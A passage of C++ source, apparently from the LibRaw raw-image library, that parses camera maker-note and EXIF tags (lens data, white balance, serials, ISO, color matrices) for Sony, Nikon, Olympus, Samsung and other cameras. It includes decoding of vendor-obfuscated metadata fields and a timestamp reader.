imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
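            // focal-length and aperture bytes below are BCD-coded, hence bcd2dec();
            // the parse_makernote_0xc634() variant above additionally validates these
            // bytes with saneSonyCameraInfo() before using them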
switch (len)
{
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
            if (table_buf[7])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
break;
default:
// CameraInfo2 & 3
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
free(table_buf);
}
else if ((tag == 0x0020) && // WBInfoA100, needs 0xb028 processing
!strncasecmp(model, "DSLR-A100", 9))
{
fseek(ifp,0x49dc,SEEK_CUR);
stmread(imgdata.shootinginfo.InternalBodySerial, 12, ifp);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 256000) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len <256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
free(table_buf);
}
}
fseek(ifp,_pos,SEEK_SET);
#endif
if (tag == 2 && strstr(make,"NIKON") && !iso_speed)
iso_speed = (get2(),get2());
if (tag == 37 && strstr(make,"NIKON") && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc,1,1,ifp);
iso_speed = int(100.0 * libraw_powf64(2.0f,float(cc)/12.0-5.0));
}
if (tag == 4 && len > 26 && len < 35) {
if ((i=(get4(),get2())) != 0x7fff && (!iso_speed || iso_speed == 65535))
iso_speed = 50 * libraw_powf64(2.0, i/32.0 - 4);
#ifdef LIBRAW_LIBRARY_BUILD
get4();
#else
if ((i=(get2(),get2())) != 0x7fff && !aperture)
aperture = libraw_powf64(2.0, i/64.0);
#endif
if ((i=get2()) != 0xffff && !shutter)
shutter = libraw_powf64(2.0, (short) i/-32.0);
wbi = (get2(),get2());
shot_order = (get2(),get2());
}
if ((tag == 4 || tag == 0x114) && !strncmp(make,"KONICA",6)) {
fseek (ifp, tag == 4 ? 140:160, SEEK_CUR);
switch (get2()) {
case 72: flip = 0; break;
case 76: flip = 6; break;
case 82: flip = 5; break;
}
}
if (tag == 7 && type == 2 && len > 20)
fgets (model2, 64, ifp);
if (tag == 8 && type == 4)
shot_order = get4();
if (tag == 9 && !strncmp(make,"Canon",5))
fread (artist, 64, 1, ifp);
if (tag == 0xc && len == 4)
FORC3 cam_mul[(c << 1 | c >> 1) & 3] = getreal(type);
if (tag == 0xd && type == 7 && get2() == 0xaaaa) {
for (c=i=2; (ushort) c != 0xbbbb && i < len; i++)
c = c << 8 | fgetc(ifp);
while ((i+=4) < len-5)
if (get4() == 257 && (i=len) && (c = (get4(),fgetc(ifp))) < 3)
flip = "065"[c]-'0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x10 && type == 4) unique_id = get4();
#endif
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos2 = ftell(ifp);
if (!strncasecmp(make,"Olympus",7))
{
short nWB, tWB;
if ((tag == 0x20300108) || (tag == 0x20310109))
imgdata.makernotes.olympus.ColorSpace = get2();
if ((tag == 0x20400102) && (len == 2) &&
(!strncasecmp(model, "E-410", 5) || !strncasecmp(model, "E-510", 5)))
{
int i;
for (i=0; i<64; i++)
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] =
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
for (i=64; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
if ((tag >= 0x20400102) && (tag <= 0x2040010d))
{
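// Olympus per-preset WB tags: each tag in this range carries the R/B (and
// optionally G) multipliers for one white-balance preset; they are recorded in
// the CCT-indexed table (WBCT_Coeffs) and, where a LibRaw preset id exists,
// also copied into the named WB_Coeffs slot.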
ushort CT;
nWB = tag-0x20400102;
switch (nWB)
{
case 0 : CT = 3000; tWB = LIBRAW_WBI_Tungsten; break;
case 1 : CT = 3300; tWB = 0x100; break;
case 2 : CT = 3600; tWB = 0x100; break;
case 3 : CT = 3900; tWB = 0x100; break;
case 4 : CT = 4000; tWB = LIBRAW_WBI_FL_W; break;
case 5 : CT = 4300; tWB = 0x100; break;
case 6 : CT = 4500; tWB = LIBRAW_WBI_FL_D; break;
case 7 : CT = 4800; tWB = 0x100; break;
case 8 : CT = 5300; tWB = LIBRAW_WBI_FineWeather; break;
case 9 : CT = 6000; tWB = LIBRAW_WBI_Cloudy; break;
case 10: CT = 6600; tWB = LIBRAW_WBI_FL_N; break;
case 11: CT = 7500; tWB = LIBRAW_WBI_Shade; break;
default: CT = 0; tWB = 0x100;
}
if (CT)
{
imgdata.color.WBCT_Coeffs[nWB][0] = CT;
imgdata.color.WBCT_Coeffs[nWB][1] = get2();
imgdata.color.WBCT_Coeffs[nWB][3] = get2();
if (len == 4)
{
imgdata.color.WBCT_Coeffs[nWB][2] = get2();
imgdata.color.WBCT_Coeffs[nWB][4] = get2();
}
}
if (tWB != 0x100)
FORC4 imgdata.color.WB_Coeffs[tWB][c] = imgdata.color.WBCT_Coeffs[nWB][c+1];
}
if ((tag >= 0x20400113) && (tag <= 0x2040011e))
{
nWB = tag-0x20400113;
imgdata.color.WBCT_Coeffs[nWB][2] = imgdata.color.WBCT_Coeffs[nWB][4] = get2();
switch (nWB)
{
case 0: tWB = LIBRAW_WBI_Tungsten; break;
case 4: tWB = LIBRAW_WBI_FL_W; break;
case 6: tWB = LIBRAW_WBI_FL_D; break;
case 8: tWB = LIBRAW_WBI_FineWeather; break;
case 9: tWB = LIBRAW_WBI_Cloudy; break;
case 10: tWB = LIBRAW_WBI_FL_N; break;
case 11: tWB = LIBRAW_WBI_Shade; break;
default: tWB = 0x100;
}
if (tWB != 0x100)
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] =
imgdata.color.WBCT_Coeffs[nWB][2];
}
if (tag == 0x20400121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
if (len == 4)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
}
if (tag == 0x2040011f)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
if (tag == 0x30000120)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
if (len == 2)
{
for (int i=0; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
}
if (tag == 0x30000121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
}
if (tag == 0x30000122)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = get2();
}
if (tag == 0x30000123)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
}
if (tag == 0x30000124)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][2] = get2();
}
if (tag == 0x30000130)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
}
if (tag == 0x30000131)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
}
if (tag == 0x30000132)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
}
if (tag == 0x30000133)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
}
if((tag == 0x20400805) && (len == 2))
{
imgdata.makernotes.olympus.OlympusSensorCalibration[0]=getreal(type);
imgdata.makernotes.olympus.OlympusSensorCalibration[1]=getreal(type);
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.olympus.OlympusSensorCalibration[0];
}
if (tag == 0x20200401)
{
imgdata.other.FlashEC = getreal(type);
}
}
fseek(ifp,_pos2,SEEK_SET);
#endif
if (tag == 0x11 && is_raw && !strncmp(make,"NIKON",5)) {
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
}
if (tag == 0x14 && type == 7) {
if (len == 2560) {
fseek (ifp, 1248, SEEK_CUR);
goto get2_256;
}
fread (buf, 1, 10, ifp);
if (!strncmp(buf,"NRW ",4)) {
fseek (ifp, strcmp(buf+4,"0100") ? 46:1546, SEEK_CUR);
cam_mul[0] = get4() << 2;
cam_mul[1] = get4() + get4();
cam_mul[2] = get4() << 2;
}
}
if (tag == 0x15 && type == 2 && is_raw)
fread (model, 64, 1, ifp);
if (strstr(make,"PENTAX")) {
if (tag == 0x1b) tag = 0x1018;
if (tag == 0x1c) tag = 0x1017;
}
if (tag == 0x1d) {
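// Nikon SerialNumber: accumulate the digits into 'serial' (used later to derive
// the maker-note decryption key); for non-numeric serials a fixed key index is
// chosen instead (34 for the D50, 96 for other bodies).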
while ((c = fgetc(ifp)) && c != EOF)
#ifdef LIBRAW_LIBRARY_BUILD
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
#endif
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
#ifdef LIBRAW_LIBRARY_BUILD
}
if (!imgdata.shootinginfo.BodySerial[0])
sprintf(imgdata.shootinginfo.BodySerial, "%d", serial);
#endif
}
if (tag == 0x29 && type == 1) { // Canon PowerShot G9
c = wbi < 18 ? "012347800000005896"[wbi]-'0' : 0;
fseek (ifp, 8 + c*32, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get4();
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x3d && type == 3 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2() >> (14-tiff_bps);
#endif
if (tag == 0x81 && type == 4) {
data_offset = get4();
fseek (ifp, data_offset + 41, SEEK_SET);
raw_height = get2() * 2;
raw_width = get2();
filters = 0x61616161;
}
if ((tag == 0x81 && type == 7) ||
(tag == 0x100 && type == 7) ||
(tag == 0x280 && type == 1)) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (tag == 0x88 && type == 4 && (thumb_offset = get4()))
thumb_offset += base;
if (tag == 0x89 && type == 4)
thumb_length = get4();
if (tag == 0x8c || tag == 0x96)
meta_offset = ftell(ifp);
if (tag == 0x97) {
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
switch (ver97) {
case 100:
fseek (ifp, 68, SEEK_CUR);
FORC4 cam_mul[(c >> 1) | ((c & 1) << 1)] = get2();
break;
case 102:
fseek (ifp, 6, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
break;
case 103:
fseek (ifp, 16, SEEK_CUR);
FORC4 cam_mul[c] = get2();
}
if (ver97 >= 200) {
if (ver97 != 205) fseek (ifp, 280, SEEK_CUR);
fread (buf97, 324, 1, ifp);
}
}
if (tag == 0xa1 && type == 7) {
order = 0x4949;
fseek (ifp, 140, SEEK_CUR);
FORC3 cam_mul[c] = get4();
}
if (tag == 0xa4 && type == 3) {
fseek (ifp, wbi*48, SEEK_CUR);
FORC3 cam_mul[c] = get2();
}
if (tag == 0xa7) { // shutter count
NikonKey = fgetc(ifp)^fgetc(ifp)^fgetc(ifp)^fgetc(ifp);
if ( (unsigned) (ver97-200) < 17) {
ci = xlat[0][serial & 0xff];
cj = xlat[1][NikonKey];
ck = 0x60;
for (i=0; i < 324; i++)
buf97[i] ^= (cj += ci * ck++);
i = "66666>666;6A;:;55"[ver97-200] - '0';
FORC4 cam_mul[c ^ (c >> 1) ^ (i & 1)] =
sget2 (buf97 + (i & -2) + c*2);
}
#ifdef LIBRAW_LIBRARY_BUILD
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
#endif
}
if(tag == 0xb001 && type == 3) // Sony ModelID
{
unique_id = get2();
}
if (tag == 0x200 && len == 3)
shot_order = (get4(),get4());
if (tag == 0x200 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x201 && len == 4)
FORC4 cam_mul[c ^ (c >> 1)] = get2();
if (tag == 0x220 && type == 7)
meta_offset = ftell(ifp);
if (tag == 0x401 && type == 4 && len == 4)
FORC4 cblack[c ^ c >> 1] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
// not corrected for file bitcount, to be patched in open_datastream
if (tag == 0x03d && strstr(make,"NIKON") && len == 4)
{
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black += i;
}
#endif
if (tag == 0xe01) { /* Nikon Capture Note */
#ifdef LIBRAW_LIBRARY_BUILD
int loopc = 0;
#endif
order = 0x4949;
fseek (ifp, 22, SEEK_CUR);
for (offset=22; offset+22 < len; offset += 22+i) {
#ifdef LIBRAW_LIBRARY_BUILD
if(loopc++>1024)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
tag = get4();
fseek (ifp, 14, SEEK_CUR);
i = get4()-4;
if (tag == 0x76a43207) flip = get2();
else fseek (ifp, i, SEEK_CUR);
}
}
if (tag == 0xe80 && len == 256 && type == 7) {
fseek (ifp, 48, SEEK_CUR);
cam_mul[0] = get2() * 508 * 1.078 / 0x10000;
cam_mul[2] = get2() * 382 * 1.173 / 0x10000;
}
if (tag == 0xf00 && type == 7) {
if (len == 614)
fseek (ifp, 176, SEEK_CUR);
else if (len == 734 || len == 1502)
fseek (ifp, 148, SEEK_CUR);
else goto next;
goto get2_256;
}
if ((tag == 0x1011 && len == 9) || tag == 0x20400200)
for (i=0; i < 3; i++)
{
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.makernotes.olympus.ColorSpace)
{
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
}
else
{
FORC3 imgdata.color.ccm[i][c] = ((short) get2()) / 256.0;
}
#else
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
#endif
}
if ((tag == 0x1012 || tag == 0x20400600) && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x1017 || tag == 0x20400100)
cam_mul[0] = get2() / 256.0;
if (tag == 0x1018 || tag == 0x20400100)
cam_mul[2] = get2() / 256.0;
if (tag == 0x2011 && len == 2) {
get2_256:
order = 0x4d4d;
cam_mul[0] = get2() / 256.0;
cam_mul[2] = get2() / 256.0;
}
if ((tag | 0x70) == 0x2070 && (type == 4 || type == 13))
fseek (ifp, get4()+base, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
if (tag == 0x2010)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, 0x2010);
fseek(ifp,_pos3,SEEK_SET);
}
if (
((tag == 0x2020) || (tag == 0x3000) || (tag == 0x2030) || (tag == 0x2031)) &&
((type == 7) || (type == 13)) &&
!strncasecmp(make,"Olympus",7)
)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, tag);
fseek(ifp,_pos3,SEEK_SET);
}
// IB end
#endif
if ((tag == 0x2020) && ((type == 7) || (type == 13)) && !strncmp(buf,"OLYMP",5))
parse_thumb_note (base, 257, 258);
if (tag == 0x2040)
parse_makernote (base, 0x2040);
if (tag == 0xb028) {
fseek (ifp, get4()+base, SEEK_SET);
parse_thumb_note (base, 136, 137);
}
if (tag == 0x4001 && len > 500 && len < 100000) {
i = len == 582 ? 50 : len == 653 ? 68 : len == 5120 ? 142 : 126;
fseek (ifp, i, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
for (i+=18; i <= len; i+=10) {
get2();
FORC4 sraw_mul[c ^ (c >> 1)] = get2();
if (sraw_mul[1] == 1170) break;
}
}
if(!strncasecmp(make,"Samsung",7))
{
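// Samsung obfuscates these maker-note values by adding words of the key read at
// tag 0xa020; decoding simply subtracts the corresponding SamsungKey[] entry.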
if (tag == 0xa020) // get the full Samsung encryption key
for (i=0; i<11; i++) SamsungKey[i] = get4();
if (tag == 0xa021) // get and decode Samsung cam_mul array
FORC4 cam_mul[c ^ (c >> 1)] = get4() - SamsungKey[c];
#ifdef LIBRAW_LIBRARY_BUILD
if (tag == 0xa023)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] = get4() - SamsungKey[8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = get4() - SamsungKey[9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = get4() - SamsungKey[10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][2] = get4() - SamsungKey[0];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] >> 4;
}
}
if (tag == 0xa024)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][c ^ (c >> 1)] = get4() - SamsungKey[c+1];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] >> 4;
}
}
if (tag == 0xa025)
imgdata.color.linear_max[0]=
imgdata.color.linear_max[1]=
imgdata.color.linear_max[2]=
imgdata.color.linear_max[3]= get4() - SamsungKey[0];
if (tag == 0xa030 && len == 9)
for (i=0; i < 3; i++)
FORC3 imgdata.color.ccm[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
#endif
if (tag == 0xa031 && len == 9) // get and decode Samsung color matrix
for (i=0; i < 3; i++)
FORC3 cmatrix[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
if (tag == 0xa028)
FORC4 cblack[c ^ (c >> 1)] = get4() - SamsungKey[c];
}
else
{
// Does somebody else use 0xa021 and 0xa028?
if (tag == 0xa021)
FORC4 cam_mul[c ^ (c >> 1)] = get4();
if (tag == 0xa028)
FORC4 cam_mul[c ^ (c >> 1)] -= get4();
}
if (tag == 0x4021 && get4() && get4())
FORC4 cam_mul[c] = 1024;
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
/*
Since the TIFF DateTime string has no timezone information,
assume that the camera's clock was set to Universal Time.
*/
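/* The expected string is "YYYY:MM:DD HH:MM:SS" (19 characters). */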
void CLASS get_timestamp (int reversed)
{
struct tm t;
char str[20];
int i;
str[19] = 0;
if (reversed)
for (i=19; i--; ) str[i] = fgetc(ifp);
else
fread (str, 19, 1, ifp);
memset (&t, 0, sizeof t);
if (sscanf (str, "%d:%d:%d %d:%d:%d", &t.tm_year, &t.tm_mon,
&t.tm_mday, &t.tm_hour, &t.tm_min, &t.tm_sec) != 6)
return;
t.tm_year -= 1900;
t.tm_mon -= 1;
t.tm_isdst = -1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
void CLASS parse_exif (int base)
{
unsigned kodak, entries, tag, type, len, save, c;
double expo,ape;
kodak = !strncmp(make,"EASTMAN",7) && tiff_nifds < 3;
entries = get2();
if(!strncmp(make,"Hasselblad",10) && (tiff_nifds > 3) && (entries > 512)) return;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && savepos + len > fsize*2) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.dng.MinFocal = getreal(type);
imgdata.lens.dng.MaxFocal = getreal(type);
imgdata.lens.dng.MaxAp4MinFocal = getreal(type);
imgdata.lens.dng.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
#endif
case 33434: tiff_ifd[tiff_nifds-1].t_shutter =
shutter = getreal(type); break;
case 33437: aperture = getreal(type); break; // 0x829d FNumber
case 34855: iso_speed = get2(); break;
case 34866:
if (iso_speed == 0xffff && (!strncasecmp(make, "SONY",4) || !strncasecmp(make, "CANON",5)))
iso_speed = getreal(type);
break;
case 36867:
case 36868: get_timestamp(0); break;
case 37377: if ((expo = -getreal(type)) < 128 && shutter == 0.)
tiff_ifd[tiff_nifds-1].t_shutter =
shutter = libraw_powf64(2.0, expo);
break;
case 37378: // 0x9202 ApertureValue
if ((fabs(ape = getreal(type))<256.0) && (!aperture))
aperture = libraw_powf64(2.0, ape/2);
break;
case 37385: flash_used = getreal(type); break;
case 37386: focal_len = getreal(type); break;
case 37500: // tag 0x927c
#ifdef LIBRAW_LIBRARY_BUILD
if (((make[0] == '\0') && (!strncmp(model, "ov5647",6))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_OV5647",9))) ||
